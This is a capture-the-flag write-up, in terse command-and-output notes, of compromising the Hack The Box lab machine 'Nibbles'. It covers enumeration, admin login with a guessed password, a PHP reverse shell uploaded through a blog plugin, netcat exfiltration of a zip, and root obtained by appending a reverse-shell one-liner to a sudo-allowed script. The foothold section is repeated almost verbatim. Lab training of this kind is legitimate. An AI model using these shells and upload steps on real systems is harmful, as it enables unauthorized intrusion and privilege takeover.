  |_http-server-header: Apache/2.4.18 (Ubuntu)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NIBBLES - INITIAL FOOTHOLD

Gain a foothold on the target and submit the user.txt flag

root@htb:~$ sudo nmap -sV -sC -T4 10.129.200.170 -p-
  PORT     STATE SERVICE       VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
  |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
  |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#conduct source code review
root@htb:~$ curl http://10.129.200.170
 <b>Hello world!</b>
 <!-- /nibbleblog/ directory. Nothing interesting here! -->

root@htb:~$ curl http://10.129.200.170/nibbleblog/
 ...
 
 * nothing interesting

//enumerate directories
root@htb:~$ find / -iname common.txt 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/

root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/common.txt .

root@htb:~$ gobuster dir -u http://10.129.200.170/ -w common.txt
 ===============================================================
 /.hta                 (Status: 403) [Size: 293]
 /.htaccess            (Status: 403) [Size: 298]
 /.htpasswd            (Status: 403) [Size: 298]
 /index.html           (Status: 200) [Size: 93]
 /server-status        (Status: 403) [Size: 302]
 Progress: 4723 / 4724 (99.98%)
 ===============================================================
 Finished
 ===============================================================
 
root@htb:~$ gobuster dir -u http://10.129.200.170/nibbleblog/ -w common.txt
 ===============================================================
 /.hta                 (Status: 403) [Size: 304]
 /.htpasswd            (Status: 403) [Size: 309]
 /.htaccess            (Status: 403) [Size: 309]
 /README               (Status: 200) [Size: 4628]
 /admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
 /admin.php            (Status: 200) [Size: 1401]
 /content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
 /index.php            (Status: 200) [Size: 2987]
 /languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
 /plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
 /themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
 Progress: 4723 / 4724 (99.98%)
 ===============================================================
 Finished
 ===============================================================

#rummage through each directory and files
root@htb:~$ curl http://10.129.200.170/nibbleblog/README
 ====== Nibbleblog ======
 Version: v4.0.3
 Codename: Coffee
 Release date: 2014-04-01

root@htb:~$ curl http://10.129.200.170/nibbleblog/admin.php
 ... 
 
 * nothing interesting
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/
 private
 public
 tmp
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/private/config.xml
 <?xml version="1.0" encoding="utf-8" standalone="yes"?>
 <config><name type="string">Nibbles</name><slogan type="string">Yum yum</slogan><footer type="string">Powered by Nibbleblog</footer><advanced_post_options type="integer">0</advanced_post_options><url type="string">http://10.10.10.134/nibbleblog/</url><path type="string">/nibbleblog/</path><items_rss type="integer">4</items_rss><items_page type="integer">6</items_page><language type="string">en_US</language><timezone type="string">UTC</timezone><timestamp_format type="string">%d %B, %Y</timestamp_format><locale type="string">en_US</locale><img_resize type="integer">1</img_resize><img_resize_width type="integer">1000</img_resize_width><img_resize_height type="integer">600</img_resize_height><img_resize_quality type="integer">100</img_resize_quality><img_resize_option type="string">auto</img_resize_option><img_thumbnail type="integer">1</img_thumbnail><img_thumbnail_width type="integer">190</img_thumbnail_width><img_thumbnail_height type="integer">190</img_thumbnail_height><img_thumbnail_quality type="integer">100</img_thumbnail_quality><img_thumbnail_option type="string">landscape</img_thumbnail_option><theme type="string">simpler</theme><notification_comments type="integer">1</notification_comments><notification_session_fail type="integer">0</notification_session_fail><notification_session_start type="integer">0</notification_session_start><notification_email_to type="string">[email protected]</notification_email_to><notification_email_from type="string">[email protected]</notification_email_from><seo_site_title type="string">Nibbles - Yum yum</seo_site_title><seo_site_description type="string"/><seo_keywords type="string"/><seo_robots type="string"/><seo_google_code type="string"/><seo_bing_code type="string"/><seo_author type="string"/><friendly_urls type="integer">0</friendly_urls><default_homepage type="integer">0</default_homepage></config>
 
 * potential PW: nibbles
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/private/users.xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 <users><user username="admin"><id type="integer">0</id><session_fail_count type="integer">0</session_fail_count><session_date type="integer">1514544131</session_date></user><blacklist type="string" ip="10.10.10.1"><date type="integer">1512964659</date><fail_count type="integer">1</fail_count></blacklist></users>
 
 * username: admin

#
root@htb:~$ BROWSER > http://10.129.200.170/admin.php
 username: admin
 password: nibbles
 
root@htb:~$ BROWSER > http://10.129.200.170/nibbleblog/admin.php?controller=plugins&action=list
 ...
 My image
 
 * this plugin could be an entry point for reverse shell


#develop capability and exploit
root@htb:~$ nano shell.php
 <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
 
root@htb:~$ BROWSER > http://10.129.200.170/nibbleblog/admin.php?controller=plugins&action=list > My image > configure 
 Title: My image
 Position: 4
 Caption: N/A
 Browse: shell.php
 
 * ignore the warnings

root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/ --wordlist big.txt -x php -r -t 100
 ...
 /content              (Status: 200) [Size: 1356]
 
root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/content --wordlist big.txt -x php -r -t 100
 /private              (Status: 200) [Size: 3020]
 /public               (Status: 200) [Size: 1576]
 /tmp                  (Status: 200) [Size: 794]

 * gobuster can only perform one-directory level at a time

root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/content/private --wordlist big.txt -x php -r -t 100
  /plugins              (Status: 200) [Size: 1816]
  
root@htb:~$ BROWSER > http://10.129.226.236/nibbleblog/content/private/plugins
 my_image
 
root@htb:~$ root@htb:~$ BROWSER > http://10.129.226.236/nibbleblog/content/private/plugins/my_image
 image.php
 
root@htb:~$ nc -nlvp 54321
root@htb:~$ curl curl http://10.129.226.236/nibbleblog/content/private/plugins/my_image/image.php
 nc ...

nibbler@Nibbles:$ id
 uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
nibbler@Nibbles:$ 

nibbler@Nibbles:$ which python3
 /usr/bin/python3

nibbler@Nibbles:$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:$ ls ~
 personal.zip  user.txt
nibbler@Nibbles:$ cat ~/user.txt
 79c03865431abf47b90ef24b9695e148

NIBBLES - PRIVILEGE ESCALATION

Escalate privileges and submit the root.txt flag.

#enumerate
root@htb:~$ sudo nmap -sV -sC -T4 10.129.200.170 -p-
  PORT     STATE SERVICE       VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
  |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
  |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#initial foothold
root@htb:~$ sudo nmap -sV -sC -T4 10.129.200.170 -p-
  PORT     STATE SERVICE       VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
  |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
  |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#conduct source code review
root@htb:~$ curl http://10.129.200.170
 <b>Hello world!</b>
 <!-- /nibbleblog/ directory. Nothing interesting here! -->

root@htb:~$ curl http://10.129.200.170/nibbleblog/
 ...
 
 * nothing interesting
 
//enumerate directories
root@htb:~$ find / -iname common.txt 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/

root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/common.txt .

root@htb:~$ gobuster dir -u http://10.129.200.170/ -w common.txt
 ===============================================================
 /.hta                 (Status: 403) [Size: 293]
 /.htaccess            (Status: 403) [Size: 298]
 /.htpasswd            (Status: 403) [Size: 298]
 /index.html           (Status: 200) [Size: 93]
 /server-status        (Status: 403) [Size: 302]
 Progress: 4723 / 4724 (99.98%)
 ===============================================================
 Finished
 ===============================================================
 
root@htb:~$ gobuster dir -u http://10.129.200.170/nibbleblog/ -w common.txt
 ===============================================================
 /.hta                 (Status: 403) [Size: 304]
 /.htpasswd            (Status: 403) [Size: 309]
 /.htaccess            (Status: 403) [Size: 309]
 /README               (Status: 200) [Size: 4628]
 /admin                (Status: 301) [Size: 327] [--> http://10.129.200.170/nibbleblog/admin/]
 /admin.php            (Status: 200) [Size: 1401]
 /content              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/content/]
 /index.php            (Status: 200) [Size: 2987]
 /languages            (Status: 301) [Size: 331] [--> http://10.129.200.170/nibbleblog/languages/]
 /plugins              (Status: 301) [Size: 329] [--> http://10.129.200.170/nibbleblog/plugins/]
 /themes               (Status: 301) [Size: 328] [--> http://10.129.200.170/nibbleblog/themes/]
 Progress: 4723 / 4724 (99.98%)
 ===============================================================
 Finished
 ===============================================================
 
#rummage through each directory and files
root@htb:~$ curl http://10.129.200.170/nibbleblog/README
 ====== Nibbleblog ======
 Version: v4.0.3
 Codename: Coffee
 Release date: 2014-04-01

root@htb:~$ curl http://10.129.200.170/nibbleblog/admin.php
 ... 
 
 * nothing interesting
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/
 private
 public
 tmp
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/private/config.xml
 <?xml version="1.0" encoding="utf-8" standalone="yes"?>
 <config><name type="string">Nibbles</name><slogan type="string">Yum yum</slogan><footer type="string">Powered by Nibbleblog</footer><advanced_post_options type="integer">0</advanced_post_options><url type="string">http://10.10.10.134/nibbleblog/</url><path type="string">/nibbleblog/</path><items_rss type="integer">4</items_rss><items_page type="integer">6</items_page><language type="string">en_US</language><timezone type="string">UTC</timezone><timestamp_format type="string">%d %B, %Y</timestamp_format><locale type="string">en_US</locale><img_resize type="integer">1</img_resize><img_resize_width type="integer">1000</img_resize_width><img_resize_height type="integer">600</img_resize_height><img_resize_quality type="integer">100</img_resize_quality><img_resize_option type="string">auto</img_resize_option><img_thumbnail type="integer">1</img_thumbnail><img_thumbnail_width type="integer">190</img_thumbnail_width><img_thumbnail_height type="integer">190</img_thumbnail_height><img_thumbnail_quality type="integer">100</img_thumbnail_quality><img_thumbnail_option type="string">landscape</img_thumbnail_option><theme type="string">simpler</theme><notification_comments type="integer">1</notification_comments><notification_session_fail type="integer">0</notification_session_fail><notification_session_start type="integer">0</notification_session_start><notification_email_to type="string">[email protected]</notification_email_to><notification_email_from type="string">[email protected]</notification_email_from><seo_site_title type="string">Nibbles - Yum yum</seo_site_title><seo_site_description type="string"/><seo_keywords type="string"/><seo_robots type="string"/><seo_google_code type="string"/><seo_bing_code type="string"/><seo_author type="string"/><friendly_urls type="integer">0</friendly_urls><default_homepage type="integer">0</default_homepage></config>
 
 * potential PW: nibbles
 
root@htb:~$ curl http://10.129.200.170/nibbleblog/content/private/users.xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 <users><user username="admin"><id type="integer">0</id><session_fail_count type="integer">0</session_fail_count><session_date type="integer">1514544131</session_date></user><blacklist type="string" ip="10.10.10.1"><date type="integer">1512964659</date><fail_count type="integer">1</fail_count></blacklist></users>
 
 * username: admin
#
root@htb:~$ BROWSER > http://10.129.200.170/nibbleblog/admin.php
 username: admin
 password: nibbles
 
root@htb:~$ BROWSER > http://10.129.200.170/nibbleblog/admin.php?controller=plugins&action=list
 ...
 My image
 
 * this plugin could be an entry point for reverse shell
 

#develop capability and exploit
root@htb:~$ nano shell.php
 <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
 
root@htb:~$ BROWSER > http://10.129.200.170/nibbleblog/admin.php?controller=plugins&action=list > My image > configure 
 Title: My image
 Position: 4
 Caption: N/A
 Browse: shell.php
 
 * ignore the warnings
 
#locate dropped shell
root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/ --wordlist big.txt -x php -r -t 100
 ...
 /content              (Status: 200) [Size: 1356]
 
root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/content --wordlist big.txt -x php -r -t 100
 /private              (Status: 200) [Size: 3020]
 /public               (Status: 200) [Size: 1576]
 /tmp                  (Status: 200) [Size: 794]

 * gobuster can only perform one-directory level at a time

root@htb:~$ gobuster dir --url http://10.129.226.236/nibbleblog/content/private --wordlist big.txt -x php -r -t 100
  /plugins              (Status: 200) [Size: 1816]
  
root@htb:~$ BROWSER > http://10.129.226.236/nibbleblog/content/private/plugins
 my_image
 
root@htb:~$ root@htb:~$ BROWSER > http://10.129.226.236/nibbleblog/content/private/plugins/my_image
 image.php	2025-06-22 21:40 	103 	 
 
 * the uploaded shell can be identified based on the modification of the
   file's time stamp
 
root@htb:~$ nc -nlvp 54321
root@htb:~$ curl http://10.129.226.236/nibbleblog/content/private/plugins/my_image/image.php
 nc ...

nibbler@Nibbles:$ id
 uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
nibbler@Nibbles:$ 

nibbler@Nibbles:$ which python3
 /usr/bin/python3

nibbler@Nibbles:$ python3 -c 'import pty; pty.spawn("/bin/bash")'
nibbler@Nibbles:$ ls ~
 personal.zip  user.txt
nibbler@Nibbles:$ cat ~/user.txt
 79c03865431abf47b90ef24b9695e148

#escalate privileges
root@oco:~$ nc -nlvp 31337 > personal.zip
 ... 
root@target:~$ which nc
root@target:~$ nc 10.10.14.41 31337 < ~/personal.zip

root@oco:~$ ls -la
 -rw-r--r--  1 htb-ac-53539 htb-ac-53539    1855 Jun 22 20:56 personal.zip

root@oco:~$ unzip personal.zip
 Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh 
  
root@oco:~$ cat monitor.sh
 ####################################################################################################
 #                                        Tecmint_monitor.sh                                        #
 # Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      #
 # If any bug, report us in the link below                                                          #
 # Free to use/edit/distribute the code below by                                                    #
 # giving proper credit to Tecmint.com and Author                                                   #
 #                                                                                                  #
 ####################################################################################################

 * use an automated Linux privilege escalation enumeration tool after
   analyzing the bash script

root@oco:~$ curl -O https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
root@oco:~$ python3 -m http.server 8080
 ...
root@target:~$ curl -O http://10.10.14.41:8080/LinEnum.sh
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
 100 46631  100 46631    0     0  1182k      0 --:--:-- --:--:-- --:--:-- 1198k

root@target:~$ chmod 777 LinEnum.sh
root@target:~$ ./LinEnum.sh
 [+] We can sudo without supplying a password!
 Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

 [+] Possible sudo pwnage!
 /home/nibbler/personal/stuff/monitor.sh
 
 * ALT: using "sudo -l" on the target (if allowed) will display the same result

root@target:~$ unzip personal.zip
 Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh 

root@target:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.41 31337 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh

 * append a reverse shell one liner to the specified file
 
root@oco:~$ nc -nlvp 31337
 ...
 
root@target:~$ sudo /home/nibbler/personal/stuff/monitor.sh 
root@Nibbles:/home/nibbler# find / -iname root.txt 2>/dev/null
 /root/root.txt
root@Nibbles:/home/nibbler# cat /root/root.txt
 de5e5d6619862a8aa5b9b212314e0cdd

PreviousPENETRATION TESTING PROCESS NextNETWORK ENUMERATION W/ NMAP

Last updated 26 days ago